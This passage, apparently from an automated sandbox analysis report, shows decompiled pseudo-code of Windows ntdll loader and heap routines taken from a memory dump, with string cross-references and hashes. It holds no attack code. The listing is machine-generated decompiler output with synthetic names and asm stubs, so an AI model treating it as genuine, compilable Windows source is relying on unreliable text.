                                            												if(_t105 != 0) {
                                            													__eflags =  *_t157 -  *_v16;
                                            													if( *_t157 >=  *_v16) {
                                            														goto L22;
                                            													} else {
                                            														asm("cdq");
                                            														_t166 = _t157[5] & 0x0000ffff;
                                            														_t108 = _t157[5] & 0x0000ffff;
                                            														asm("cdq");
                                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                            														if(__eflags > 0) {
                                            															L29:
                                            															E01002280(_t108, 0x10d86cc);
                                            															 *_t118 =  *_t118 + 1;
                                            															_t42 = _t118 + 0x40; // 0x3f
                                            															_t156 = _t42;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															_t110 = E010161A0( &_v32);
                                            															__eflags = _t110;
                                            															if(_t110 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t134 = _v20;
                                            																	L55:
                                            																	E010B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                            																}
                                            															}
                                            															L30:
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															E00FFFFB0(_t118, _t156, 0x10d86cc);
                                            															goto L22;
                                            														} else {
                                            															if(__eflags < 0) {
                                            																goto L22;
                                            															} else {
                                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                            																	goto L22;
                                            																} else {
                                            																	goto L29;
                                            																}
                                            															}
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												goto L22;
                                            											}
                                            											asm("lock inc dword [eax]");
                                            											goto L21;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						return _t143;
                                            					}
                                            				} else {
                                            					_push( &_v8);
                                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                                            					_push(__ecx + 0x40);
                                            					_push(_t121);
                                            					_push(0xffffffff);
                                            					_t80 = E01029A00();
                                            					_t159 = _t80;
                                            					if(_t159 < 0) {
                                            						L8:
                                            						return _t80;
                                            					} else {
                                            						goto L2;
                                            					}
                                            				}
                                            				L56:
                                            			}

                                            Strings
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01049C28
                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01049C18
                                            • LdrpDoPostSnapWork, xrefs: 01049C1E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 2994545307-1948996284
                                            • Opcode ID: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                                            • Instruction ID: 3ceba34ab0b283dc1b4bce1900ab90c69d1003bc1a1573607350b4abb8bb20da
                                            • Opcode Fuzzy Hash: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
                                            • Instruction Fuzzy Hash: 10910672A0021EDFDF28DF59C8C1ABA77B5FF44394B544169EA41AB260DB70ED02DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0101AC7B(void* __ecx, signed short* __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				void* __ebx;
                                            				signed char _t75;
                                            				signed int _t79;
                                            				signed int _t88;
                                            				intOrPtr _t89;
                                            				signed int _t96;
                                            				signed char* _t97;
                                            				intOrPtr _t98;
                                            				signed int _t101;
                                            				signed char* _t102;
                                            				intOrPtr _t103;
                                            				signed int _t105;
                                            				signed char* _t106;
                                            				signed int _t131;
                                            				signed int _t138;
                                            				void* _t149;
                                            				signed short* _t150;
                                            
                                            				_t150 = __edx;
                                            				_t149 = __ecx;
                                            				_t70 =  *__edx & 0x0000ffff;
                                            				__edx[1] = __edx[1] & 0x000000f8;
                                            				__edx[3] = 0;
                                            				_v8 =  *__edx & 0x0000ffff;
                                            				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                            					_t39 =  &(_t150[8]); // 0x8
                                            					E0103D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                            					__edx[1] = __edx[1] | 0x00000004;
                                            				}
                                            				_t75 =  *(_t149 + 0xcc) ^  *0x10d8a68;
                                            				if(_t75 != 0) {
                                            					L4:
                                            					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                            						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                            						_t79 =  *(_t149 + 0x50);
                                            						 *_t150 =  *_t150 ^ _t79;
                                            						return _t79;
                                            					}
                                            					return _t75;
                                            				} else {
                                            					_t9 =  &(_t150[0x80f]); // 0x1017
                                            					_t138 = _t9 & 0xfffff000;
                                            					_t10 =  &(_t150[0x14]); // 0x20
                                            					_v12 = _t138;
                                            					if(_t138 == _t10) {
                                            						_t138 = _t138 + 0x1000;
                                            						_v12 = _t138;
                                            					}
                                            					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                            					if(_t75 > _t138) {
                                            						_v8 = _t75 - _t138;
                                            						_push(0x4000);
                                            						_push( &_v8);
                                            						_push( &_v12);
                                            						_push(0xffffffff);
                                            						_t131 = E010296E0();
                                            						__eflags = _t131 - 0xc0000045;
                                            						if(_t131 == 0xc0000045) {
                                            							_t88 = E01093C60(_v12, _v8);
                                            							__eflags = _t88;
                                            							if(_t88 != 0) {
                                            								_push(0x4000);
                                            								_push( &_v8);
                                            								_push( &_v12);
                                            								_push(0xffffffff);
                                            								_t131 = E010296E0();
                                            							}
                                            						}
                                            						_t89 =  *[fs:0x30];
                                            						__eflags = _t131;
                                            						if(_t131 < 0) {
                                            							__eflags =  *(_t89 + 0xc);
                                            							if( *(_t89 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E00FEB150();
                                            							} else {
                                            								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_v8);
                                            							_push(_v12);
                                            							_push(_t149);
                                            							_t75 = E00FEB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                            							goto L4;
                                            						} else {
                                            							_t96 =  *(_t89 + 0x50);
                                            							_t132 = 0x7ffe0380;
                                            							__eflags = _t96;
                                            							if(_t96 != 0) {
                                            								__eflags =  *_t96;
                                            								if( *_t96 == 0) {
                                            									goto L10;
                                            								}
                                            								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            								L11:
                                            								__eflags =  *_t97;
                                            								if( *_t97 != 0) {
                                            									_t98 =  *[fs:0x30];
                                            									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                            									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                            										E010A14FB(_t132, _t149, _v12, _v8, 7);
                                            									}
                                            								}
                                            								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                            								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                            								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                            								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                            								_t101 =  *( *[fs:0x30] + 0x50);
                                            								__eflags = _t101;
                                            								if(_t101 != 0) {
                                            									__eflags =  *_t101;
                                            									if( *_t101 == 0) {
                                            										goto L13;
                                            									}
                                            									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            									goto L14;
                                            								} else {
                                            									L13:
                                            									_t102 = _t132;
                                            									L14:
                                            									__eflags =  *_t102;
                                            									if( *_t102 != 0) {
                                            										_t103 =  *[fs:0x30];
                                            										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                            										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                            											__eflags = E01007D50();
                                            											if(__eflags != 0) {
                                            												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                            											}
                                            											E010A1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                            										}
                                            									}
                                            									_t133 = 0x7ffe038a;
                                            									_t105 =  *( *[fs:0x30] + 0x50);
                                            									__eflags = _t105;
                                            									if(_t105 != 0) {
                                            										__eflags =  *_t105;
                                            										if( *_t105 == 0) {
                                            											goto L16;
                                            										}
                                            										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                            										goto L17;
                                            									} else {
                                            										L16:
                                            										_t106 = _t133;
                                            										L17:
                                            										__eflags =  *_t106;
                                            										if( *_t106 != 0) {
                                            											__eflags = E01007D50();
                                            											if(__eflags != 0) {
                                            												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                            											}
                                            											E010A1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                            										}
                                            										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                            										_t150[1] = _t75;
                                            										goto L4;
                                            									}
                                            								}
                                            							}
                                            							L10:
                                            							_t97 = _t132;
                                            							goto L11;
                                            						}
                                            					} else {
                                            						goto L4;
                                            					}
                                            				}
                                            			}























                                            Strings
                                            • HEAP[%wZ]: , xrefs: 0105A0AD
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0105A0CD
                                            • HEAP: , xrefs: 0105A0BA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: 4ba39935adc4a340c1367f69cd086f2d0ceb748fbae89dfbf7a2ae29214c8bfc
                                            • Instruction ID: a07f8766687f05a840e893860988f7a72dd5e142ff5cb0a7b8bc4904c76f3aad
                                            • Opcode Fuzzy Hash: 4ba39935adc4a340c1367f69cd086f2d0ceb748fbae89dfbf7a2ae29214c8bfc
                                            • Instruction Fuzzy Hash: CB81E671305A84EFE726DBACC894BAABBF4FF04714F0441A5E9C187692D778E940CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E0100B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                            				signed int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				void* _t72;
                                            				char _t76;
                                            				signed char _t77;
                                            				intOrPtr* _t80;
                                            				unsigned int _t85;
                                            				signed int* _t86;
                                            				signed int _t88;
                                            				signed char _t89;
                                            				intOrPtr _t90;
                                            				intOrPtr _t101;
                                            				intOrPtr* _t111;
                                            				void* _t117;
                                            				intOrPtr* _t118;
                                            				signed int _t120;
                                            				signed char _t121;
                                            				intOrPtr* _t123;
                                            				signed int _t126;
                                            				intOrPtr _t136;
                                            				signed int _t139;
                                            				void* _t140;
                                            				signed int _t141;
                                            				void* _t147;
                                            
                                            				_t111 = _a4;
                                            				_t140 = __ecx;
                                            				_v8 = __edx;
                                            				_t3 = _t111 + 0x18; // 0x0
                                            				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                            				_t5 = _t111 - 8; // -32
                                            				_t141 = _t5;
                                            				 *(_t111 + 0x14) = _a8;
                                            				_t72 = 4;
                                            				 *(_t141 + 2) = 1;
                                            				 *_t141 = _t72;
                                            				 *((char*)(_t141 + 7)) = 3;
                                            				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                            				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                            					_t76 = (_t141 - __edx >> 0x10) + 1;
                                            					_v12 = _t76;
                                            					__eflags = _t76 - 0xfe;
                                            					if(_t76 >= 0xfe) {
                                            						_push(__edx);
                                            						_push(0);
                                            						E010AA80D(_t134, 3, _t141, __edx);
                                            						_t76 = _v12;
                                            					}
                                            				} else {
                                            					_t76 = 0;
                                            				}
                                            				 *((char*)(_t141 + 6)) = _t76;
                                            				if( *0x10d8748 >= 1) {
                                            					__eflags = _a12 - _t141;
                                            					if(_a12 <= _t141) {
                                            						goto L4;
                                            					}
                                            					_t101 =  *[fs:0x30];
                                            					__eflags =  *(_t101 + 0xc);
                                            					if( *(_t101 + 0xc) == 0) {
                                            						_push("HEAP: ");
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                            					E00FEB150();
                                            					__eflags =  *0x10d7bc8;
                                            					if(__eflags == 0) {
                                            						E010A2073(_t111, 1, _t140, __eflags);
                                            					}
                                            					goto L3;
                                            				} else {
                                            					L3:
                                            					_t147 = _a12 - _t141;
                                            					L4:
                                            					if(_t147 != 0) {
                                            						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                            					}
                                            					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                            						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                            						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                            					}
                                            					_t135 =  *(_t111 + 0x14);
                                            					if( *(_t111 + 0x14) == 0) {
                                            						L12:
                                            						_t77 =  *((intOrPtr*)(_t141 + 6));
                                            						if(_t77 != 0) {
                                            							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                            						} else {
                                            							_t117 = _t140;
                                            						}
                                            						_t118 = _t117 + 0x38;
                                            						_t26 = _t111 + 8; // -16
                                            						_t80 = _t26;
                                            						_t136 =  *_t118;
                                            						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                            							_push(_t118);
                                            							_push(0);
                                            							E010AA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                            						} else {
                                            							 *_t80 = _t136;
                                            							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                            							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                            							 *_t118 = _t80;
                                            						}
                                            						_t120 = _v8;
                                            						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                            						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                            						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                            						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                            						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                            							__eflags =  *(_t140 + 0xb8);
                                            							if( *(_t140 + 0xb8) == 0) {
                                            								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                            								__eflags = _t88 - 2;
                                            								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                            								__eflags =  *0x10d8720 & 0x00000001;
                                            								_t89 = _t88 & 0xffffff00 | ( *0x10d8720 & 0x00000001) == 0x00000000;
                                            								__eflags = _t89 & _t121;
                                            								if((_t89 & _t121) != 0) {
                                            									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                            								}
                                            							}
                                            						}
                                            						_t85 =  *(_t111 + 0x14);
                                            						if(_t85 >= 0x7f000) {
                                            							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                            						}
                                            						_t86 = _a16;
                                            						 *_t86 = _t141 - _a12 >> 3;
                                            						return _t86;
                                            					} else {
                                            						_t90 = E0100B8E4(_t135);
                                            						_t123 =  *((intOrPtr*)(_t90 + 4));
                                            						if( *_t123 != _t90) {
                                            							_push(_t123);
                                            							_push( *_t123);
                                            							E010AA80D(0, 0xd, _t90, 0);
                                            						} else {
                                            							 *_t111 = _t90;
                                            							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                            							 *_t123 = _t111;
                                            							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                            						}
                                            						_t139 =  *(_t140 + 0xb8);
                                            						if(_t139 != 0) {
                                            							_t93 =  *(_t111 + 0x14) >> 0xc;
                                            							__eflags = _t93;
                                            							while(1) {
                                            								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                            								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                            									break;
                                            								}
                                            								_t126 =  *_t139;
                                            								__eflags = _t126;
                                            								if(_t126 != 0) {
                                            									_t139 = _t126;
                                            									continue;
                                            								}
                                            								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                            								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                            								break;
                                            							}
                                            							E0100E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                            						}
                                            						goto L12;
                                            					}
                                            				}
                                            			}































                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: 038865fda4c0138ef50f380262a8c4470fe794bf0a27494ddaff3f52cdeb8416
                                            • Instruction ID: 8f4abdd935afdfeadf06088466632550cd1f4fae81bb3c1e7e6730d27b7737db
                                            • Opcode Fuzzy Hash: 038865fda4c0138ef50f380262a8c4470fe794bf0a27494ddaff3f52cdeb8416
                                            • Instruction Fuzzy Hash: 0261FA74600241DFEB5ACF28C445B6ABBE5FF04714F14859EE8898F392D734E941CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00FF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				char _v24;
                                            				signed int _t73;
                                            				void* _t77;
                                            				char* _t82;
                                            				char* _t87;
                                            				signed char* _t97;
                                            				signed char _t102;
                                            				intOrPtr _t107;
                                            				signed char* _t108;
                                            				intOrPtr _t112;
                                            				intOrPtr _t124;
                                            				intOrPtr _t125;
                                            				intOrPtr _t126;
                                            
                                            				_t107 = __edx;
                                            				_v12 = __ecx;
                                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                            				_t124 = 0;
                                            				_v20 = __edx;
                                            				if(E00FFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                            					_t112 = _v8;
                                            				} else {
                                            					_t112 = 0;
                                            					_v8 = 0;
                                            				}
                                            				if(_t112 != 0) {
                                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                            						_t124 = 0xc000007b;
                                            						goto L8;
                                            					}
                                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                            					 *(_t125 + 0x34) = _t73;
                                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                            						goto L3;
                                            					}
                                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                            					_t124 = E00FEC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                            					if(_t124 < 0) {
                                            						goto L8;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                            						L8:
                                            						return _t124;
                                            					}
                                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                            							goto L5;
                                            						}
                                            						_t102 =  *0x10d5780; // 0x0
                                            						if((_t102 & 0x00000003) != 0) {
                                            							E01065510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                            							_t102 =  *0x10d5780; // 0x0
                                            						}
                                            						if((_t102 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            						_t124 = 0xc0000428;
                                            						goto L8;
                                            					}
                                            					L5:
                                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                            						goto L8;
                                            					}
                                            					_t77 = _a4 - 0x40000003;
                                            					if(_t77 == 0 || _t77 == 0x33) {
                                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                            						if(E01007D50() != 0) {
                                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            						} else {
                                            							_t82 = 0x7ffe0384;
                                            						}
                                            						_t108 = 0x7ffe0385;
                                            						if( *_t82 != 0) {
                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01007D50() == 0) {
                                            									_t97 = 0x7ffe0385;
                                            								} else {
                                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t97 & 0x00000020) != 0) {
                                            									E01067016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            						}
                                            						if(_a4 != 0x40000003) {
                                            							L14:
                                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                            							if(E01007D50() != 0) {
                                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            							} else {
                                            								_t87 = 0x7ffe0384;
                                            							}
                                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01007D50() != 0) {
                                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t108 & 0x00000020) != 0) {
                                            									E01067016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            							goto L8;
                                            						} else {
                                            							_v16 = _t125 + 0x24;
                                            							_t124 = E0101A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                            							if(_t124 < 0) {
                                            								E00FEB1E1(_t124, 0x1490, 0, _v16);
                                            								goto L8;
                                            							}
                                            							goto L14;
                                            						}
                                            					} else {
                                            						goto L8;
                                            					}
                                            				}
                                            			}





















                                            Strings
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01049891
                                            • LdrpCompleteMapModule, xrefs: 01049898
                                            • minkernel\ntdll\ldrmap.c, xrefs: 010498A2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                                            • Instruction ID: 7101b3ed0d1a25a08e89ea2e09f1deb5f0970211734b92dc075fdbcec4177115
                                            • Opcode Fuzzy Hash: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
                                            • Instruction Fuzzy Hash: 42510372A08749DBE721DB5CC984B7ABBE4AF04324F1405EAEA919B3E1D774ED00D790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E010923E3(signed int __ecx, unsigned int __edx) {
                                            				intOrPtr _v8;
                                            				intOrPtr _t42;
                                            				char _t43;
                                            				signed short _t44;
                                            				signed short _t48;
                                            				signed char _t51;
                                            				signed short _t52;
                                            				intOrPtr _t54;
                                            				signed short _t64;
                                            				signed short _t66;
                                            				intOrPtr _t69;
                                            				signed short _t73;
                                            				signed short _t76;
                                            				signed short _t77;
                                            				signed short _t79;
                                            				void* _t83;
                                            				signed int _t84;
                                            				signed int _t85;
                                            				signed char _t94;
                                            				unsigned int _t99;
                                            				unsigned int _t104;
                                            				signed int _t108;
                                            				void* _t110;
                                            				void* _t111;
                                            				unsigned int _t114;
                                            
                                            				_t84 = __ecx;
                                            				_push(__ecx);
                                            				_t114 = __edx;
                                            				_t42 =  *((intOrPtr*)(__edx + 7));
                                            				if(_t42 == 1) {
                                            					L49:
                                            					_t43 = 1;
                                            					L50:
                                            					return _t43;
                                            				}
                                            				if(_t42 != 4) {
                                            					if(_t42 >= 0) {
                                            						if( *(__ecx + 0x4c) == 0) {
                                            							_t44 =  *__edx & 0x0000ffff;
                                            						} else {
                                            							_t73 =  *__edx;
                                            							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                            								_t73 = _t73 ^  *(__ecx + 0x50);
                                            							}
                                            							_t44 = _t73 & 0x0000ffff;
                                            						}
                                            					} else {
                                            						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x10d874c ^ __ecx;
                                            						if(_t104 == 0) {
                                            							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                            						} else {
                                            							_t76 = 0;
                                            						}
                                            						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                            					}
                                            					_t94 =  *((intOrPtr*)(_t114 + 7));
                                            					_t108 = _t44 & 0xffff;
                                            					if(_t94 != 5) {
                                            						if((_t94 & 0x00000040) == 0) {
                                            							if((_t94 & 0x0000003f) == 0x3f) {
                                            								if(_t94 >= 0) {
                                            									if( *(_t84 + 0x4c) == 0) {
                                            										_t48 =  *_t114 & 0x0000ffff;
                                            									} else {
                                            										_t66 =  *_t114;
                                            										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                            											_t66 = _t66 ^  *(_t84 + 0x50);
                                            										}
                                            										_t48 = _t66 & 0x0000ffff;
                                            									}
                                            								} else {
                                            									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x10d874c ^ _t84;
                                            									if(_t99 == 0) {
                                            										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                            									} else {
                                            										_t69 = 0;
                                            									}
                                            									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                            								}
                                            								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                            							} else {
                                            								_t85 = _t94 & 0x3f;
                                            							}
                                            						} else {
                                            							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                            						}
                                            					} else {
                                            						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                            					}
                                            					_t110 = (_t108 << 3) - _t85;
                                            				} else {
                                            					if( *(__ecx + 0x4c) == 0) {
                                            						_t77 =  *__edx & 0x0000ffff;
                                            					} else {
                                            						_t79 =  *__edx;
                                            						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                            							_t79 = _t79 ^  *(__ecx + 0x50);
                                            						}
                                            						_t77 = _t79 & 0x0000ffff;
                                            					}
                                            					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                            				}
                                            				_t51 =  *((intOrPtr*)(_t114 + 7));
                                            				if(_t51 != 5) {
                                            					if((_t51 & 0x00000040) == 0) {
                                            						_t52 = 0;
                                            						goto L42;
                                            					}
                                            					_t64 = _t51 & 0x3f;
                                            					goto L38;
                                            				} else {
                                            					_t64 =  *(_t114 + 6) & 0x000000ff;
                                            					L38:
                                            					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                            					L42:
                                            					_t35 = _t114 + 8; // -16
                                            					_t111 = _t110 + (_t52 & 0x0000ffff);
                                            					_t83 = _t35 + _t111;
                                            					_t54 = E0103D4F0(_t83, 0xfc6c58, 8);
                                            					_v8 = _t54;
                                            					if(_t54 == 8) {
                                            						goto L49;
                                            					}
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E00FEB150();
                                            					} else {
                                            						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push(_t111);
                                            					_push(_v8 + _t83);
                                            					E00FEB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            						 *0x10d6378 = 1;
                                            						asm("int3");
                                            						 *0x10d6378 = 0;
                                            					}
                                            					_t43 = 0;
                                            					goto L50;
                                            				}
                                            			}




























                                            0x01092559
                                            0x0109256a
                                            0x0109256d
                                            0x01092574
                                            0x01092586
                                            0x01092588
                                            0x0109258f
                                            0x01092590
                                            0x01092590
                                            0x01092597
                                            0x00000000
                                            0x01092597
